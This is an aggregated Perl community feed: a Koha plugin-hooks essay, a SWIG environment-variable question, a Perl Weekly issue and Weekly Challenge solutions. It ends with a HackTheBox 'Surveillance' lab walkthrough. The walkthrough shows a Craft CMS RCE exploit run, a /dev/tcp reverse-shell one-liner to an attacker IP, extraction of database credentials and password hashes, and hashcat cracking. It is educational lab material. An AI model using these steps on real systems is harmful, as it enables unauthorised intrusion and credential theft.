I have some memories (not sure if fond or nightmarish) of a system I built between 1998 and 2004 which (ab)used the free access Perl provides to the symbol table to use some config data to dynamically generate classes, which could then later be subclassed for even more customization.

But whatever you use to implement them, the big disadvantage of Implicit Hooks is that it is rather hard to figure out when & why each piece of code is called. But to actually and properly use implicit hooks, you will also have to properly structure your code in your core classes into many small methods instead of big 100-line monsters, which also improves testability.
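To make the contrast concrete, here is a small Python sketch of an implicit hook. The around helper is hypothetical and only loosely modelled on the idea behind Moose's around modifier, not on its implementation. The core class contains no hook calls at all; the plugin wraps the method from the outside.

```python
import functools


class SomeThingModel:
    """Core code: nothing here hints that plugins exist."""

    def create(self, args):
        return {"id": 1, **args}


def around(cls, method_name, wrapper):
    """Hypothetical helper: replace cls.method_name with a wrapped version.

    The wrapper receives the original method first, then self and the
    arguments, and decides if and how to call the original.
    """
    original = getattr(cls, method_name)

    @functools.wraps(original)
    def wrapped(self, *args, **kwargs):
        return wrapper(original, self, *args, **kwargs)

    setattr(cls, method_name, wrapped)


def audit_plugin(original, self, args):
    args = dict(args, status="new")   # "pre" part: munge the arguments
    item = original(self, args)       # call the core implementation
    item["audited"] = True            # "post" part: sees the created item
    return item


# Plugin load time: the core class is modified without editing its source.
around(SomeThingModel, "create", audit_plugin)

item = SomeThingModel().create({"title": "Example"})
print(item)
```

Reading SomeThingModel.create alone gives no clue that audit_plugin runs, which is exactly the "hard to figure out when & why" problem.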

So which is better?

Generally, "it depends". But for Koha I think Explicit Hooks are better:

- For a start, Koha already has a Plugin system using Explicit Hooks. Throwing this away (plus all the existing Plugins using this system) would be madness (unless switching to Implicit Hooks provides very convincing benefits, which I doubt).

- Koha still has a bunch of rather large methods that do a lot and thus are not very easily subclassed or modified by dynamic code.

- Koha also calls plugins from what are basically CGI scripts, so sometimes there isn't even a class or method available to modify (though this old code is constantly being modernized)

- Handling all the corner cases of implicitly called hooks (like needing to call next or SUPER) might be a bit too much for some Plugin authors (who might be more on the librarian-who-can-code-a-bit side of the spectrum than on the dev-who-happens-to-work-with-libraries side).

- A large code base like Koha's, which is often worked on by non-core-devs, needs to be greppable. But Implicit Hooks are basically invisible and don't show up when looking through the Core code.

- But most importantly, because Explicit Hooks are boring technology, and I've learned in the last 10 years that boring > magic!

Using implicit hooks could maybe make sense if Koha

- is refactored to have all its code in classes that follow a logical class hierarchy and use lots of small methods (which should be a goal in itself, independent of the Plugin system)

- somebody comes up with a smart way to allow Plugin authors to not have to care about all the weird corner cases and problems (like MRO and diamond inheritance, Plugin call order, the annoying syntax of things like around in Moose, error handling, ...).

And while my fingers are itching to come up with such a smart system, I think dev time is currently better spent on other issues and improvements.

P.S.: I'm currently traveling through Albania, so I might be slow to reply to any feedback.

My environment is perl/5.18.2 on CentOS 7

I'm trying to use a SWIG-generated module in Perl, which has a C++ backend. The backend.cpp sets an environment variable, $MY_ENV_VAR = 1

But when I try to access this in perl, using $ENV{MY_ENV_VAR} this is undef.

However doing something like print `echo \$MY_ENV_VAR` works

So the variable is set in the process, but it's not reflected automatically since nothing updates the $ENV data structure.

I'm assuming it may work using some getEnv like mechanism, but is there a way to reset/ refresh the $ENV that it rebuilds itself from the current environment?
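The same effect can be reproduced outside Perl and SWIG, which suggests it is a property of how scripting languages cache the environment rather than of the binding. The Python sketch below is an analogy, not a Perl fix: it assumes a POSIX system where ctypes.CDLL(None) exposes the C library, and the variable name MY_ENV_VAR_DEMO is made up for the demonstration.

```python
import ctypes
import os

# Assumption: POSIX system; CDLL(None) gives access to the C library's symbols.
libc = ctypes.CDLL(None)
libc.setenv.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_int]
libc.setenv.restype = ctypes.c_int
libc.getenv.argtypes = [ctypes.c_char_p]
libc.getenv.restype = ctypes.c_char_p

# Set the variable behind the interpreter's back, like the C++ backend does.
libc.setenv(b"MY_ENV_VAR_DEMO", b"1", 1)

# os.environ is a mapping filled at startup; it is not re-read from the process.
from_snapshot = os.environ.get("MY_ENV_VAR_DEMO")

# Asking the C library directly sees the new value.
from_libc = libc.getenv(b"MY_ENV_VAR_DEMO")

print(from_snapshot, from_libc)
```

The variable is present in the process environment, but the language-level mapping was filled earlier and never learns about it, so only a direct getenv-style lookup returns the value.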

Steps to reproduce:

- Create a cpp class with the setenv function Example.h : ```

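#ifndef EXAMPLE_H
#define EXAMPLE_H

#include <cstdlib>  // setenv

class Example {
public:
    // Sets an environment variable in the current process via the C library.
    void setEnvVariable(const char* name, const char* value) { setenv(name, value, 1); }
};

#endif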

```

- create SWIG interface file to generate perl bindings : Example.i

```

%module Example

%{

#include "Example.h"

%}

%include "Example.h"

```

- Generate swig bindings with following 3 commands:

```

swig -perl -c++ Example.i

g++ -c -fpic Example_wrap.cxx -I /usr/lib/perl5/CORE/

g++ -shared Example_wrap.o -o Example.so

```

- Run this perl one-liner, which uses cpp to set the env var, and prints it

```

perl -e 'use Example; my $ex = new Example::Example(); $ex->setEnvVariable("MY_VAR", "Hello from C++!"); print "\n\n var from ENV hash is -".$ENV{MY_VAR}."-\n"; print `echo var from system call is \$MY_VAR`'

```


Perl Weekly #665 - How to get better at Perl?

dev.to #perlPublished by Gabor Szabo on Monday 22 April 2024 05:14

Originally published at Perl Weekly 665

Hi there!

A new subscriber of the Perl Weekly wrote me:

"I've used Perl for a while but I would love to be fluent in it. Please let me know if you have any advice."

I think the best way is to work on projects and if you can find nice people who have time to comment on your work then ask them. Depending on your level you might want to try Exercism that has a Perl track for practice and a built-in system for asking for and getting feedback on the specific exercises. Even better, once you did the exercises you can become a mentor there helping others. That gives you another opportunity to look at these problems and help other people like yourself.

You can participate in The Weekly Challenge run by Mohammad S. Anwar, the other editor of the Perl Weekly.

Longer term I'd suggest to work on a real project.

Either create a project for yourself or start contributing to open source projects (e.g. CPAN modules). I'd start by trying to contribute to active projects, that is, ones that saw a release recently. MetaCPAN has a page showing recent CPAN releases and the CPAN Digger provides some analytics and suggestions for recent CPAN releases. You can also contribute to MetaCPAN itself. This is also a nice way to contribute back to the Perl community.

Finally, Happy Passover celebrating the freedom of Jews from slavery. Let me wish to you the same we have been saying for hundreds of years at the end of the Passover dinner:

Next year in Jerusalem!

--

Your editor: Gabor Szabo.

Announcements

The Perl and Raku Conference: Call for Speakers Renewed

Including this despite the fact that the new deadline has already passed. Unfortunately the extension was announced after the previous edition of the Perl Weekly was published, but maybe they will extend it a few more days. So check it!

Phishing Attempt on PAUSE Users

Articles

Orion SSG v5.0.0 released to GitHub

Fast Perl SSG: now with automatic Language Translation via OCI and translate.pl. On GitHub

Things I learned at the Koha Hackfest in Marseille

It is always fun to read the event reports by Thomas Klausner (aka domm).

I can still count browser tabs

Ricardo switched from Chrome to Firefox and thus had to write some Perl code to count his tabs.

Getting Started with perlimports

perlimports is a linter that helps you tidy up your code, and Olaf explains in the blog why tidying imports is important.

How to manipulate files on different servers

I am rather surprised by the patience of the people who responded.

Net::SSH::Expect - jump server then to remote device?

Why I Like Perl's OO

Recommended reading along with some of the comments on the Reddit thread. Especially the one by brian d foy talking about the organization and modelling vs. features and syntax.

Grants

Grant Application: Dancer 2 Documentation Project

Please comment on this grant application!

The Weekly Challenge

The Weekly Challenge by Mohammad Sajid Anwar will help you step out of your comfort-zone. We pick one champion at the end of the month from among all of the contributors during the month.

The Weekly Challenge - 266

Welcome to a new week with a couple of fun tasks "Uncommon Words" and "X Matrix". If you are new to the weekly challenge then why not join us and have fun every week. For more information, please read the FAQ.

RECAP - The Weekly Challenge - 265

Enjoy a quick recap of last week's contributions by Team PWC dealing with the "33% Appearance" and "Completing Word" tasks in Perl and Raku. You will find plenty of solutions to keep you busy.

TWC265

Perl regex is in action again and it didn't disappoint as always. Thanks for sharing.

33% Word

Raku special keyword 'Nil' is very handy when dealing with undef. Raku Rocks !!!

Matter Of Fact, It's All Dark

Sort using hashes to shortcut uniq is a big thing. You must checkout why?

Perl Weekly Challenge: Week 265

Perl and Raku in one blog is a deadly combination. You get to know how to do things in Perl to replicate the Raku features.

The Weekly Challenge - 265

Jame's special is the highlight that you don't want to skip. Always get to learn something new every week.

For Almost a Third Complete

Using CPAN module can help you get a classic one-liner as Jorg shared in the post. Highly recommended.

Perl Weekly Challenge 265: 33% Appearance

How would you replicate Bag of Raku in Perl? Checkout the post to find the answer.

Perl Weekly Challenge 265: Completing Word

Raku first then port to Perl, simply incredible. Keep it up great work.

arrays and dictionaries

Any PostgreSQL fan? Checkout how you would solve the challenge using SQL power. Well done.

Perl Weekly Challenge 265

Master of one-liner in Perl. Consistency is the key, wonder how is it possible?

Completing a Third of an Appearance

Mix of Perl, Raku and Python. You pick your favourite, mine is Python since it is new to me.

Frequent number and shortest word

A very interesting take on Perl regex. First time, seen something like this, brilliant work.

The Weekly Challenge - 265

CPAN can never let you down. It has solution for every task. See yourself how?

The Weekly Challenge #265

Short and simple analysis, no nonsense approach. Keep it up great work.

The Appearance of Completion

For all Perl fans, I suggest you take a closer look at the last statement. It really surprised me, thanks for sharing.

Completing Appearance

Just love the neat and clean solution in Python with surprise element too. Keep sharing.

Weekly collections

NICEPERL's lists

Great CPAN modules released last week;

The corner of Gabor

A couple of entries sneaked in by Gabor.

GitHub Sponsors - A series on giving and receiving 💰

Recently I decided to renew my efforts to get more sponsors via GitHub Sponsors. In order to understand how to do it better I am going to write a series of articles. This is the first one. At one point I'd also like to feature the Perl-developers who could be supported this way. So far I encountered two people: magnus woldrich and Dave Cross and myself. I'd like to ask you to 1) Add some sponsorship to these two people so when I write about them there will be a few sponsors already. 2) Let me know if you know about any other Perl-developer who is accepting sponsorships via GitHub Sponsors.


(C) Copyright Gabor Szabo

The articles are copyright the respective authors.

(cdxcii) 5 great CPAN modules released last week

NiceperlPublished by Unknown on Sunday 21 April 2024 13:58

- Alien::ImageMagick - cpanm compatible Image::Magick packaging.
  - Version: 0.10 on 2024-04-18, with 13 votes
  - Previous CPAN version: 0.09 was 1 year, 9 months, 20 days before
  - Author: AMBS

- CPAN::Audit - Audit CPAN distributions for known vulnerabilities
  - Version: 20240414.001 on 2024-04-15, with 13 votes
  - Previous CPAN version: 20240410.001 was 5 days before
  - Author: BDFOY

- SPVM - SPVM Language
  - Version: 0.989104 on 2024-04-20, with 31 votes
  - Previous CPAN version: 0.989101 was 7 days before
  - Author: KIMOTO

- Term::Choose - Choose items from a list interactively.
  - Version: 1.764 on 2024-04-20, with 14 votes
  - Previous CPAN version: 1.763 was 3 months, 2 days before
  - Author: KUERBIS

- Text::CSV_XS - Comma-Separated Values manipulation routines
  - Version: 1.54 on 2024-04-18, with 101 votes
  - Previous CPAN version: 1.53 was 4 months, 25 days before
  - Author: HMBRAND

Weekly Challenge 265

Each week Mohammad S. Anwar sends out The Weekly Challenge, a chance for all of us to come up with solutions to two weekly tasks. My solutions are written in Python first, and then converted to Perl. It's a great way for us all to practice some coding.

Task 1: 33% Appearance

Task

You are given an array of integers, @ints.

Write a script to find an integer in the given array that appeared 33% or more. If more than one found, return the smallest. If none found then return undef.

My solution

In past challenges, if I had to calculate the frequency of a thing (be it numbers, letters or strings), I would do this in a for loop. I have since discovered Python's Counter class (from the collections module), which does this for me.

Once I've used it to get the frequency of each integer and stored the result in a variable freq, I calculate the value that represents 33% of the number of items in the list and store it as percent_33.

The last step is to loop through the sorted list of integers and return the first value that appears at least percent_33 times. I return None (undef in Perl) if no values match the criterion.

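from collections import Counter

def appearance_33(ints: list) -> int | None:
    # Frequency of each integer in the input
    freq = Counter(ints)
    # Minimum number of occurrences that counts as 33% of the list
    percent_33 = 0.33 * len(ints)

    # Check candidates in ascending order so the smallest match wins
    for i in sorted(freq):
        if freq[i] >= percent_33:
            return i

    return None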

Examples

$ ./ch-1.py 1 2 3 3 3 3 4 2

3

$ ./ch-1.py 1 1

1

$ ./ch-1.py 1 2 3

1
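The examples can be checked by hand: with 8 integers the threshold is 0.33 × 8 = 2.64, so only 3 (which appears 4 times) qualifies; with 3 integers the threshold is 0.99, so every value qualifies and the smallest is returned. As a cross-check, here is a sketch of a variant that does the same comparison in integer arithmetic. The name appearance_33_int is hypothetical and not part of the original solution.

```python
from collections import Counter


def appearance_33_int(ints):
    """Same rule as above, but compares count * 100 >= 33 * len(ints),
    so no floating-point threshold is involved."""
    freq = Counter(ints)
    total = len(ints)
    for value in sorted(freq):
        if freq[value] * 100 >= 33 * total:
            return value
    return None


results = [
    appearance_33_int([1, 2, 3, 3, 3, 3, 4, 2]),
    appearance_33_int([1, 1]),
    appearance_33_int([1, 2, 3]),
    appearance_33_int([1, 2, 3, 4]),
]
print(results)
```

The last call has four distinct values, each making up 25% of the list, so nothing reaches the threshold and the function returns None.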

Task 2: Completing Word

Task

You are given a string, $str containing alphanumeric characters and array of strings (alphabetic characters only), @str.

Write a script to find the shortest completing word. If none found return empty string.

A completing word is a word that contains all the letters in the given string, ignoring space and number. If a letter appeared more than once in the given string then it must appear the same number or more in the word.

My solution

str is the name of a built-in type in Python, so to avoid shadowing it I used s for the given string and str_list for the list. For this challenge, I also use Counter in my Python solution.

These are the steps I perform:

- Calculate the frequency of letters in the given string after converting it to lower case and removing anything that isn't an English letter of the alphabet (i.e. a to z).
- Sort the str_list list by the length of the string, shortest first.
- Loop through each item in str_list as a variable word. For each word:
  - Calculate the frequency of each letter, after converting it to lower case. This is stored as word_freq.
  - For each letter in the original string (the freq dict), check that it occurs at least that many times in the word_freq dict. If it doesn't, move to the next word.

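import re
from collections import Counter

def completing_word(s: str, str_list: list) -> str | None:
    # Letter frequencies of the given string, ignoring case, digits and spaces
    freq = Counter(re.sub('[^a-z]', '', s.lower()))
    # Shortest words first, so the first match is the shortest completing word
    str_list.sort(key=len)

    for word in str_list:
        word_freq = Counter(word.lower())
        for letter, count in freq.items():
            if word_freq.get(letter, 0) < count:
                break
        else:
            # The inner loop did not break: every letter occurs often enough
            return word

    return None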

Examples

$ ./ch-2.pl "aBc 11c" accbbb abc abbc

accbbb

$ ./ch-2.pl "Da2 abc" abcm baacd abaadc

baacd

$ ./ch-2.pl "JB 007" jj bb bjb

bjb
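The inner loop can also be expressed with Counter subtraction, which keeps only positive counts: if nothing is left after subtracting the word's letters from the required letters, the word is a completing word. This is an alternative sketch, not the original solution; completing_word_alt is a hypothetical name. It uses sorted() so the caller's list is left unmodified.

```python
import re
from collections import Counter


def completing_word_alt(s, words):
    # Letters still required, ignoring case, digits and spaces
    need = Counter(re.sub(r"[^a-z]", "", s.lower()))
    for word in sorted(words, key=len):
        # Counter subtraction drops zero and negative counts, so an empty
        # result means the word supplies every required letter often enough.
        if not need - Counter(word.lower()):
            return word
    return None


results = [
    completing_word_alt("aBc 11c", ["accbbb", "abc", "abbc"]),
    completing_word_alt("Da2 abc", ["abcm", "baacd", "abaadc"]),
    completing_word_alt("JB 007", ["jj", "bb", "bjb"]),
    completing_word_alt("abc", ["ab"]),
]
print(results)
```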

HackTheBox - Writeup Surveillance [Retired]

dev.to #perlPublished by Guilherme Martins on Saturday 20 April 2024 15:29

Hackthebox

In this writeup we will explore a medium-difficulty Linux machine called Surveillance, which covers the following vulnerabilities and exploitation techniques:

- CVE-2023-41892 - Remote Code Execution

- Password Cracking with hashcat

- CVE-2023-26035 - Unauthenticated RCE

- Command Injection

We start by scanning our target for open ports:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# nmap -sV --open -Pn 10.129.45.83

Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 19:11 EST

Nmap scan report for 10.129.45.83

Host is up (0.27s latency).

Not shown: 998 closed tcp ports (reset)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)

80/tcp open http nginx 1.18.0 (Ubuntu)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

From this we can see that two ports are open: port 22 for SSH and port 80, which is running nginx.

nginx is a web server and reverse proxy, so let's visit the target in a browser.

When we do, we are redirected to http://surveillance.htb, so we add that hostname to our /etc/hosts.



With that in place we get the following web page:

It is the website of a security and monitoring company that offers cameras, access control, and so on.

Next we look for endpoints and directories using gobuster:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://surveillance.htb/ -k

===============================================================

Gobuster v3.4

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: http://surveillance.htb/

[+] Method: GET

[+] Threads: 10

[+] Wordlist: /usr/share/wordlists/dirb/big.txt

[+] Negative Status codes: 404

[+] User Agent: gobuster/3.4

[+] Timeout: 10s

===============================================================

2023/12/11 19:12:59 Starting gobuster in directory enumeration mode

===============================================================

/.htaccess (Status: 200) [Size: 304]

/admin (Status: 302) [Size: 0] [--> http://surveillance.htb/admin/login]

/css (Status: 301) [Size: 178] [--> http://surveillance.htb/css/]

/fonts (Status: 301) [Size: 178] [--> http://surveillance.htb/fonts/]

/images (Status: 301) [Size: 178] [--> http://surveillance.htb/images/]

/img (Status: 301) [Size: 178] [--> http://surveillance.htb/img/]

/index (Status: 200) [Size: 1]

/js (Status: 301) [Size: 178] [--> http://surveillance.htb/js/]

/logout (Status: 302) [Size: 0] [--> http://surveillance.htb/]

/p13 (Status: 200) [Size: 16230]

/p1 (Status: 200) [Size: 16230]

/p10 (Status: 200) [Size: 16230]

/p15 (Status: 200) [Size: 16230]

/p2 (Status: 200) [Size: 16230]

/p3 (Status: 200) [Size: 16230]

/p7 (Status: 200) [Size: 16230]

/p5 (Status: 200) [Size: 16230]

/wp-admin (Status: 418) [Size: 24409]

Progress: 20469 / 20470 (100.00%)

===============================================================



Here we have some interesting endpoints, among them /admin. From it we can identify the CMS the site was built with, which turns out to be Craft CMS:

According to the Craft CMS website itself, Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond.

Searching for vulnerabilities, we find CVE-2023-41892, which is a Remote Code Execution:

- https://securityonline.info/researcher-to-release-poc-exploit-for-critical-craft-cms-rce-cve-2023-41892-bug/?expand_article=1

- poc: https://gist.github.com/to016/b796ca3275fa11b5ab9594b1522f7226

Here we modify the PoC so that we can exploit the vulnerability to upload the file and execute remote commands.

Now with shell access:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# python3 CVE-2023-41892.py http://surveillance.htb/

[-] Get temporary folder and document root ...

[-] Write payload to temporary file ...

[-] Trigger imagick to write shell ...

[-] Done, enjoy the shell

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Since this shell is quite limited, in another tab we start pwncat, a shell handler with many additional features:

┌──(root㉿kali)-[/home/kali]

└─# pwncat-cs -lp 9001

[16:57:07] Welcome to pwncat 🐈! __main__.py:164

Now we create a file called rev.sh with the following content and run it:

$ cat /tmp/rev.sh

sh -i 5<> /dev/tcp/10.10.14.229/9001 0<&5 1>&5 2>&5

$ bash /tmp/rev.sh

With that we have our reverse shell in pwncat:

┌──(root㉿kali)-[/home/kali]

└─# pwncat-cs -lp 9001

[16:57:07] Welcome to pwncat 🐈! __main__.py:164

[17:00:52] received connection from 10.129.39.90:48380 bind.py:84

[17:00:57] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957

[17:01:00] 10.129.39.90:48380: registered new host w/ db manager.py:957

(local) pwncat$

(remote) www-data@surveillance:/var/www/html/craft/web/cpresources$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

With access, we can enumerate the system, starting by listing the users:

(remote) www-data@surveillance:/var/www/html/craft$ grep -i bash /etc/passwd

root:x:0:0:root:/root:/bin/bash

matthew:x:1000:1000:,,,:/home/matthew:/bin/bash

zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash

Here we have three users: matthew, zoneminder and root.

Looking for sensitive files, we find the .env file, which, as the name suggests, contains the variables and values that the application uses:

(remote) www-data@surveillance:/var/www/html/craft$ cat .env

# Read about configuration, here:

# https://craftcms.com/docs/4.x/config/

# The application ID used to to uniquely store session and cache data, mutex locks, and more

CRAFT_APP_ID=CraftCMS--070c5b0b-ee27-4e50-acdf-0436a93ca4c7

# The environment Craft is currently running in (dev, staging, production, etc.)

CRAFT_ENVIRONMENT=production

# The secure key Craft will use for hashing and encrypting data

CRAFT_SECURITY_KEY=2HfILL3OAEe5X0jzYOVY5i7uUizKmB2_

# Database connection settings

CRAFT_DB_DRIVER=mysql

CRAFT_DB_SERVER=127.0.0.1

CRAFT_DB_PORT=3306

CRAFT_DB_DATABASE=craftdb

CRAFT_DB_USER=craftuser

CRAFT_DB_PASSWORD=CraftCMSPassword2023!

CRAFT_DB_SCHEMA=

CRAFT_DB_TABLE_PREFIX=

# General settings (see config/general.php)

DEV_MODE=false

ALLOW_ADMIN_CHANGES=false

DISALLOW_ROBOTS=false

PRIMARY_SITE_URL=http://surveillance.htb/

Enumerating the open ports on the target host, we notice MySQL on port 3306 and another application on port 8080, both listening only locally:

(remote) www-data@surveillance:/var/www/html/craft$ netstat -nltp

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -

tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 991/nginx: worker p

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 991/nginx: worker p

tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -

tcp6 0 0 :::22 :::* LISTEN -

(remote) www-data@surveillance:/var/www/html/craft$

With the data we obtained we can access the database:

(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -h 127.0.0.1 -P 3306 -p

Enter password:

Welcome to the MariaDB monitor. Commands end with ; or \g.

Your MariaDB connection id is 20621

Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;

+--------------------+

| Database |

+--------------------+

| craftdb |

| information_schema |

+--------------------+

2 rows in set (0.001 sec)

MariaDB [(none)]> use craftdb;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

MariaDB [craftdb]> show tables;

+----------------------------+

| Tables_in_craftdb |

+----------------------------+

| addresses |

| announcements |

| assetindexdata |

| assetindexingsessions |

| assets |

| categories |

| categorygroups |

| categorygroups_sites |

| changedattributes |

| changedfields |

| content |

| craftidtokens |

| deprecationerrors |

| drafts |

| elements |

| elements_sites |

| entries |

| entrytypes |

| fieldgroups |

| fieldlayoutfields |

| fieldlayouts |

| fieldlayouttabs |

| fields |

| globalsets |

| gqlschemas |

| gqltokens |

| imagetransformindex |

| imagetransforms |

| info |

| matrixblocks |

| matrixblocks_owners |

| matrixblocktypes |

| migrations |

| plugins |

| projectconfig |

| queue |

| relations |

| resourcepaths |

| revisions |

| searchindex |

| sections |

| sections_sites |

| sequences |

| sessions |

| shunnedmessages |

| sitegroups |

| sites |

| structureelements |

| structures |

| systemmessages |

| taggroups |

| tags |

| tokens |

| usergroups |

| usergroups_users |

| userpermissions |

| userpermissions_usergroups |

| userpermissions_users |

| userpreferences |

| users |

| volumefolders |

| volumes |

| widgets |

+----------------------------+

63 rows in set (0.001 sec)

MariaDB [craftdb]> desc users;

+----------------------------+---------------------+------+-----+---------+-------+

| Field | Type | Null | Key | Default | Extra |

+----------------------------+---------------------+------+-----+---------+-------+

| id | int(11) | NO | PRI | NULL | |

| photoId | int(11) | YES | MUL | NULL | |

| active | tinyint(1) | NO | MUL | 0 | |

| pending | tinyint(1) | NO | MUL | 0 | |

| locked | tinyint(1) | NO | MUL | 0 | |

| suspended | tinyint(1) | NO | MUL | 0 | |

| admin | tinyint(1) | NO | | 0 | |

| username | varchar(255) | YES | MUL | NULL | |

| fullName | varchar(255) | YES | | NULL | |

| firstName | varchar(255) | YES | | NULL | |

| lastName | varchar(255) | YES | | NULL | |

| email | varchar(255) | YES | MUL | NULL | |

| password | varchar(255) | YES | | NULL | |

| lastLoginDate | datetime | YES | | NULL | |

| lastLoginAttemptIp | varchar(45) | YES | | NULL | |

| invalidLoginWindowStart | datetime | YES | | NULL | |

| invalidLoginCount | tinyint(3) unsigned | YES | | NULL | |

| lastInvalidLoginDate | datetime | YES | | NULL | |

| lockoutDate | datetime | YES | | NULL | |

| hasDashboard | tinyint(1) | NO | | 0 | |

| verificationCode | varchar(255) | YES | MUL | NULL | |

| verificationCodeIssuedDate | datetime | YES | | NULL | |

| unverifiedEmail | varchar(255) | YES | | NULL | |

| passwordResetRequired | tinyint(1) | NO | | 0 | |

| lastPasswordChangeDate | datetime | YES | | NULL | |

| dateCreated | datetime | NO | | NULL | |

| dateUpdated | datetime | NO | | NULL | |

+----------------------------+---------------------+------+-----+---------+-------+

27 rows in set (0.001 sec)

MariaDB [craftdb]> select admin,username,email,password from users;

+-------+----------+------------------------+--------------------------------------------------------------+

| admin | username | email | password |

+-------+----------+------------------------+--------------------------------------------------------------+

| 1 | admin | admin@surveillance.htb | $2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe |

+-------+----------+------------------------+--------------------------------------------------------------+

1 row in set (0.000 sec)

However, we had no success trying to crack the user's hash.

Continuing the enumeration, we find a database backup file:

(remote) www-data@surveillance:/var/www/html/craft/storage$ cd backups/

(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ ls -alh

total 28K

drwxrwxr-x 2 www-data www-data 4.0K Oct 17 20:33 .

drwxr-xr-x 6 www-data www-data 4.0K Oct 11 20:12 ..

-rw-r--r-- 1 root root 20K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql.zip

(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip

Archive: surveillance--2023-10-17-202801--v4.4.14.sql.zip

inflating: surveillance--2023-10-17-202801--v4.4.14.sql

(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ ls -alh

total 140K

drwxrwxr-x 2 www-data www-data 4.0K Dec 12 02:17 .

drwxr-xr-x 6 www-data www-data 4.0K Oct 11 20:12 ..

-rw-r--r-- 1 www-data www-data 111K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql

-rw-r--r-- 1 root root 20K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql.zip

And here we have a different kind of hash for the user:

INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');

This hash type is SHA256, so we can use hashcat to crack the password, using the value 1400 for the hash type and specifying the rockyou.txt wordlist:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]

└─# hashcat -m 1400 matthew-hash /usr/share/wordlists/rockyou.txt

hashcat (v6.2.6) starting

...

Dictionary cache hit:

* Filename..: /usr/share/wordlists/rockyou.txt

* Passwords.: 14344389

* Bytes.....: 139921546

* Keyspace..: 14344389

39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490

Session..........: hashcat

Status...........: Cracked

Hash.Mode........: 1400 (SHA2-256)

Hash.Target......: 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c...5770ec

Time.Started.....: Mon Dec 11 21:32:28 2023 (2 secs)

Time.Estimated...: Mon Dec 11 21:32:30 2023 (0 secs)

Kernel.Feature...: Pure Kernel

Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)

Guess.Queue......: 1/1 (100.00%)

Speed.#1.........: 1596.7 kH/s (0.13ms) @ Accel:256 Loops:1 Thr:1 Vec:16

Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)

Progress.........: 3552256/14344389 (24.76%)

Rejected.........: 0/3552256 (0.00%)

Restore.Point....: 3551232/14344389 (24.76%)

Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1

Candidate.Engine.: Device Generator

Candidates.#1....: starfish789 -> starbowser

Hardware.Mon.#1..: Util: 42%

Started: Mon Dec 11 21:32:04 2023

Stopped: Mon Dec 11 21:32:31 2023

And here we get the password of the admin user, which belongs to Matthew B. This user exists on the server, as we saw in our initial enumeration.
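The two hashes differ in format, which helps explain why the first resisted cracking while the second fell in seconds. The value in the live database has the bcrypt layout ($2y$ prefix, two-digit cost, 53 further characters), and bcrypt is deliberately slow. The value in the backup is 64 hexadecimal characters, which is consistent with a plain SHA-256 digest. The sketch below only inspects the format; describe_hash is a hypothetical helper, and 64 hex characters could in principle come from other 256-bit hash functions too.

```python
import re

# bcrypt: "$2a$", "$2b$" or "$2y$", a two-digit cost, then 22 salt + 31 hash chars
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
# 64 hex characters = 256 bits, the size of a SHA-256 digest
HEX64_RE = re.compile(r"^[0-9a-fA-F]{64}$")


def describe_hash(value):
    """Return (kind, work_factor); work_factor is 2**cost for bcrypt, else None."""
    match = BCRYPT_RE.match(value)
    if match:
        return ("bcrypt", 2 ** int(match.group(1)))
    if HEX64_RE.match(value):
        return ("256-bit hex digest", None)
    return ("unknown", None)


live = "$2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe"
backup = "39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec"

print(describe_hash(live))
print(describe_hash(backup))
```

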